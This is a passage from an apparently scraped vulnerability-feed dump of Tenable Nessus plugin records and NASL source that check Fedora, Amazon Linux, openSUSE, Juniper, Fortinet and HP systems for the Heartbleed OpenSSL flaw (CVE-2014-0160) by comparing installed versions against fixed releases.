value:\"http://www.nessus.org/u?cfcceed5\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openssl package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:N\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'OpenSSL Heartbeat Information Leak');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"openssl-1.0.1e-37.fc19.1\")) flag++;\n\n\nif (flag)\n{\n report = rpm_report_get();\n\n if(!egrep(pattern:\"package installed.+openssl[^0-9]*\\-1\\.0\\.1\", string:report)) exit(0, \"The remote host does not use OpenSSL 1.0.1\");\n\n if (report_verbosity > 0) security_hole(port:0, extra:report);\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.4, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:N"}}, {"lastseen": "2021-01-01T03:19:45", "description": "According to its self-reported version, the version of IVE / UAC OS\nrunning on the remote host is affected by an information disclosure\nvulnerability.\n\nAn out-of-bounds read error, known as the 'Heartbleed Bug', exists\nrelated to handling TLS heartbeat extensions that could allow an\nattacker to obtain sensitive information such as primary key material,\nsecondary key material, and other protected content.", "edition": 26, "published": "2014-04-18T00:00:00", "title": "Junos Pulse Secure Access IVE / UAC OS OpenSSL Heartbeat Information Disclosure (JSA10623) (Heartbleed)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:juniper:ive_os", "cpe:/a:juniper:junos_pulse_access_control_service", "cpe:/a:juniper:junos_pulse_secure_access_service"], "id": "JUNOS_PULSE_JSA10623.NASL", "href": "https://www.tenable.com/plugins/nessus/73688", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73688);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2019/11/26\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_bugtraq_id(66690);\n script_xref(name:\"CERT\", value:\"720951\");\n script_xref(name:\"EDB-ID\", value:\"32745\");\n script_xref(name:\"EDB-ID\", value:\"32764\");\n script_xref(name:\"EDB-ID\", value:\"32791\");\n script_xref(name:\"EDB-ID\", value:\"32998\");\n\n script_name(english:\"Junos Pulse Secure Access IVE / UAC OS OpenSSL Heartbeat Information Disclosure (JSA10623) (Heartbleed)\");\n script_summary(english:\"Checks IVE/UAC OS version\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by an information disclosure\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the version of IVE / UAC OS\nrunning on the remote host is affected by an information disclosure\nvulnerability.\n\nAn out-of-bounds read error, known as the 'Heartbleed Bug', exists\nrelated to handling TLS heartbeat extensions that could allow an\nattacker to obtain sensitive information such as primary key material,\nsecondary key material, and other protected content.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kb.juniper.net/InfoCenter/index?page=content&id=KB29004\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kb.juniper.net/InfoCenter/index?page=content&id=KB29007\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10623\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.heartbleed.com\");\n script_set_attribute(attribute:\"see_also\", value:\"https://eprint.iacr.org/2014/140\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/vulnerabilities.html#2014-0160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20140407.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Juniper Junos IVE OS version 7.4R9.3 / 8.0R3.2 or later or\nUAC OS version 4.4R10 / 5.0R3.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0160\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:juniper:ive_os\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:juniper:junos_pulse_secure_access_service\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:juniper:junos_pulse_access_control_service\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/Juniper/IVE OS/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit('Host/Juniper/IVE OS/Version');\nmatch = eregmatch(string:version, pattern:\"^([\\d.]+)[Rr]([0-9.]+)\");\nif (isnull(match)) exit(1, 'Error parsing version: ' + version);\n\nrelease = match[1];\nbuild = match[2];\n\n# IVE OS\n# 7.4R1 to 7.4R9\nif (release == '7.4' && ver_compare(ver:build, fix:'9.3', strict:FALSE) == -1)\n fix = '7.4r9.3';\n# 8.0R1 to 8.0R3\nelse if (release == '8.0' && ver_compare(ver:build, fix:'3.2', strict:FALSE) == -1)\n fix = '8.0r3.2';\n\n# UAC OS\n# 4.4R1 to 4.4R9\nelse if (release == '4.4' && ver_compare(ver:build, fix:'10', strict:FALSE) == -1)\n fix = '4.4r10';\n# 5.0R1 to 5.0R3\nelse if (release == '5.0' && ver_compare(ver:build, fix:'3.2', strict:FALSE) == -1)\n fix = '5.0r3.2';\n\nelse\n audit(AUDIT_INST_VER_NOT_VULN, 'IVE/UAC OS', version);\n\nif (report_verbosity > 0)\n{\n report =\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix + '\\n';\n security_warning(port:0, extra:report);\n}\nelse security_warning(0);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-01T01:18:46", "description": "A missing bounds check was found in the way OpenSSL handled TLS\nheartbeat extension packets. This flaw could be used to reveal up to\n64k of memory from a connected client or server.", "edition": 22, "published": "2014-04-09T00:00:00", "title": "Amazon Linux AMI : openssl Information Disclosure Vulnerability (ALAS-2014-320)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:openssl-devel", "p-cpe:/a:amazon:linux:openssl", "p-cpe:/a:amazon:linux:openssl-debuginfo", "p-cpe:/a:amazon:linux:openssl-perl", "p-cpe:/a:amazon:linux:openssl-static", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2014-320.NASL", "href": "https://www.tenable.com/plugins/nessus/73438", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2014-320.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73438);\n script_version(\"$Revision: 1.6 $\");\n script_cvs_date(\"$Date: 2015/09/01 13:42:18 $\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_xref(name:\"ALAS\", value:\"2014-320\");\n\n script_name(english:\"Amazon Linux AMI : openssl Information Disclosure Vulnerability (ALAS-2014-320)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A missing bounds check was found in the way OpenSSL handled TLS\nheartbeat extension packets. This flaw could be used to reveal up to\n64k of memory from a connected client or server.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://heartbleed.com/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.openssl.org/news/secadv/20140407.txt\"\n );\n # http://aws.amazon.com/amazon-linux-ami/security-bulletins/ALAS-2014-320/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5c70c979\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Run 'yum update openssl' to update your system and restart all\nservices that are using openssl.  While the new package is still\nnamed openssl-1.0.1e, it does contain the fix for CVE-2014-0160.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:N\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'OpenSSL Heartbeat (Heartbleed) Information Leak');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:openssl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:openssl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:openssl-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:openssl-static\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/AmazonLinux/release\")) audit(AUDIT_OS_NOT, \"Amazon Linux AMI\");\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"openssl-1.0.1e-37.66.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"openssl-debuginfo-1.0.1e-37.66.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"openssl-devel-1.0.1e-37.66.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"openssl-perl-1.0.1e-37.66.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"openssl-static-1.0.1e-37.66.amzn1\")) flag++;\n\nif (flag)\n{\n report = rpm_report_get();\n if (!egrep(pattern:\"package installed.+openssl[^0-9]*\\-1\\.0\\.1\", string:report)) exit(0, \"The remote host does not use OpenSSL 1.0.1.\");\n\n if (report_verbosity > 0) security_hole(port:0, extra:report);\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssl / openssl-debuginfo / openssl-devel / openssl-perl / etc\");\n}\n", "cvss": {"score": 9.4, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:N"}}, {"lastseen": "2021-01-01T02:34:51", "description": "The firmware of the remote Fortinet host is running a version of\nOpenSSL that is affected by a remote information disclosure,\ncommonly known as the 'Heartbleed' bug. A remote, unauthenticated,\nattacker could potentially exploit this vulnerability to extract up to\n64 kilobytes of memory per request from the device.", "edition": 26, "published": "2014-04-11T00:00:00", "title": "Fortinet OpenSSL Information Disclosure (Heartbleed)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:fortinet:fortios"], "id": "FORTINET_FG-IR-14-011.NASL", "href": "https://www.tenable.com/plugins/nessus/73669", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73669);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/11/26\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_bugtraq_id(66690);\n script_xref(name:\"CERT\", value:\"720951\");\n script_xref(name:\"EDB-ID\", value:\"32745\");\n script_xref(name:\"EDB-ID\", value:\"32764\");\n script_xref(name:\"EDB-ID\", value:\"32791\");\n script_xref(name:\"EDB-ID\", value:\"32998\");\n\n script_name(english:\"Fortinet OpenSSL Information Disclosure (Heartbleed)\");\n script_summary(english:\"Checks version of Fortinet device.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by an information disclosure\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The firmware of the remote Fortinet host is running a version of\nOpenSSL that is affected by a remote information disclosure,\ncommonly known as the 'Heartbleed' bug. A remote, unauthenticated,\nattacker could potentially exploit this vulnerability to extract up to\n64 kilobytes of memory per request from the device.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://fortiguard.com/psirt/FG-IR-14-011\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.heartbleed.com\");\n script_set_attribute(attribute:\"see_also\", value:\"https://eprint.iacr.org/2014/140\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/vulnerabilities.html#2014-0160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20140407.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to a firmware version containing a fix for this\nvulnerability as referenced in the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0160\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/04/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fortinet:fortios\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"fortinet_version.nbin\");\n script_require_keys(\"Host/Fortigate/model\", \"Host/Fortigate/version\", \"Host/Fortigate/build\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nmodel = get_kb_item_or_exit(\"Host/Fortigate/model\");\nversion = get_kb_item_or_exit(\"Host/Fortigate/version\");\nbuild = get_kb_item_or_exit(\"Host/Fortigate/build\");\n\n# FortiOS check.\nif (preg(string:model, pattern:\"forti(gate|wifi)\", icase:TRUE))\n{\n # Only 5.x is affected.\n if (version =~ \"^5\\.\") fix = \"5.0.7\";\n}\n# FortiMail Check\nelse if (preg(string:model, pattern:\"fortimail\", icase:TRUE))\n{\n # Only 4.3.x and 5.x are affected.\n if (version =~ \"^4\\.3\\.\") fix = \"4.3.7\";\n else if (version =~ \"^5\\.0\\.\") fix = \"5.0.5\";\n else if (version =~ \"^5\\.1\\.\") fix = \"5.1.2\";\n}\n# FortiRecorder Check, all affected.\nelse if (preg(string:model, pattern:\"fortirecorder\", icase:TRUE))\n{\n fix = \"1.4.1\";\n}\n# FortiVoice check, specific models affected.\nelse if (preg(string:model, pattern:\"fortivoice-(200d|vm)\", icase:TRUE))\n{\n fix = \"3.0.1\";\n}\n# FortiADC, specific models and versions affected.\nelse if (preg(string:model, pattern:\"fortiadc\", icase:TRUE))\n{\n if (model =~ \"E$\" && version =~ \"^3\\.\") fix = \"3.2.3\";\n else if (model =~ \"-(15|20|40)00D$\") fix = \"3.2.2\";\n}\n# FortiDDOS B-Series affected.\nelse if (preg(string:model, pattern:\"fortiddos-\\d+B\", icase:TRUE))\n{\n fix = \"4.0.1\";\n}\n\nif (fix && ver_compare(ver:version, fix:fix, strict:FALSE) == -1)\n{\n port = 0;\n if (report_verbosity > 0)\n {\n report =\n '\\n Model : ' + model +\n '\\n Version : ' + version +\n '\\n Fixed Version: ' + fix +\n '\\n';\n\n security_warning(extra:report, port:port);\n }\n else security_warning(port:port);\n exit(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, model, version);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-01T03:15:42", "description": "The HP Version Control Repository Manager (VCRM) install\non the remote Windows host is version 7.2.0, 7.2.1, 7.2.2, 7.3.0, or\n7.3.1. It is, therefore, affected by an information disclosure\nvulnerability.\n\nAn out-of-bounds read error, known as the 'Heartbleed Bug', exists\nrelated to handling TLS heartbeat extensions that could allow an\nattacker to obtain sensitive information such as primary key material,\nsecondary key material, and other protected content.", "edition": 28, "published": "2014-08-06T00:00:00", "title": "HP Version Control Repository Manager (VCRM) Heartbeat Information Disclosure (Heartbleed)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:hp:version_control_repository_manager"], "id": "HP_VCRM_SSRT101531.NASL", "href": "https://www.tenable.com/plugins/nessus/77025", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(77025);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_bugtraq_id(66690);\n script_xref(name:\"CERT\", value:\"720951\");\n script_xref(name:\"EDB-ID\", value:\"32745\");\n script_xref(name:\"EDB-ID\", value:\"32764\");\n script_xref(name:\"EDB-ID\", value:\"32791\");\n script_xref(name:\"EDB-ID\", value:\"32998\");\n script_xref(name:\"HP\", value:\"emr_na-c04262472\");\n script_xref(name:\"HP\", value:\"HPSBMU03020\");\n script_xref(name:\"HP\", value:\"SSRT101531\");\n\n script_name(english:\"HP Version Control Repository Manager (VCRM) Heartbeat Information Disclosure (Heartbleed)\");\n script_summary(english:\"Checks the version of the VCA package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host contains software that is affected by an information\ndisclosure vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The HP Version Control Repository Manager (VCRM) install\non the remote Windows host is version 7.2.0, 7.2.1, 7.2.2, 7.3.0, or\n7.3.1. It is, therefore, affected by an information disclosure\nvulnerability.\n\nAn out-of-bounds read error, known as the 'Heartbleed Bug', exists\nrelated to handling TLS heartbeat extensions that could allow an\nattacker to obtain sensitive information such as primary key material,\nsecondary key material, and other protected content.\");\n # https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-c04262472\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ea63ebcc\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.heartbleed.com\");\n script_set_attribute(attribute:\"see_also\", value:\"https://eprint.iacr.org/2014/140\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/vulnerabilities.html#2014-0160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20140407.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VCRM 7.3.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0160\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/08/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:hp:version_control_repository_manager\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"hp_version_control_repo_manager_installed.nbin\");\n script_require_keys(\"installed_sw/HP Version Control Repository Manager\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\nappname = \"HP Version Control Repository Manager\";\nget_install_count(app_name:appname, exit_if_zero:TRUE);\n\n# Only 1 install is possible at a time\ninstalls = get_installs(app_name:appname);\nif (installs[0] == IF_NOT_FOUND) audit(AUDIT_NOT_INST, appname);\ninstall = installs[1][0];\n\nversion = install['version'];\npath = install['path'];\n\n# Unknown version\nif (version == UNKNOWN_VER) audit(AUDIT_UNKNOWN_APP_VER,appname);\n\n# These exact versions are vulnerable\nif (\n version =~ \"^7\\.2\\.[0-2]\\.\" ||\n version =~ \"^7\\.3\\.[0-1]\\.\"\n)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 7.3.2' +\n '\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, appname, version, path);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-06-05T11:12:16", "description": "This openssl update fixes one security issue :\n\n - bnc#872299: Fixed missing bounds checks for heartbeat\n messages (CVE-2014-0160).", "edition": 19, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : openssl (openSUSE-SU-2014:0492-1) (Heartbleed)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "modified": "2014-06-13T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:openssl", "cpe:/o:novell:opensuse:12.3", "p-cpe:/a:novell:opensuse:libopenssl1_0_0-32bit", "p-cpe:/a:novell:opensuse:libopenssl1_0_0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:openssl-debugsource", "p-cpe:/a:novell:opensuse:libopenssl-devel", "p-cpe:/a:novell:opensuse:openssl-debuginfo", "p-cpe:/a:novell:opensuse:libopenssl1_0_0-debuginfo", "p-cpe:/a:novell:opensuse:libopenssl-devel-32bit", "p-cpe:/a:novell:opensuse:libopenssl1_0_0", "cpe:/o:novell:opensuse:13.1"], "id": "OPENSUSE-2014-277.NASL", "href": "https://www.tenable.com/plugins/nessus/75314", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-277.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(75314);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/04\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_bugtraq_id(66690);\n\n script_name(english:\"openSUSE Security Update : openssl (openSUSE-SU-2014:0492-1) (Heartbleed)\");\n script_summary(english:\"Check for the openSUSE-2014-277 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This openssl update fixes one security issue :\n\n - bnc#872299: Fixed missing bounds checks for heartbeat\n messages (CVE-2014-0160).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=872299\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2014-04/msg00015.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openssl packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libopenssl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libopenssl-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libopenssl1_0_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libopenssl1_0_0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libopenssl1_0_0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libopenssl1_0_0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssl-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/04/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is 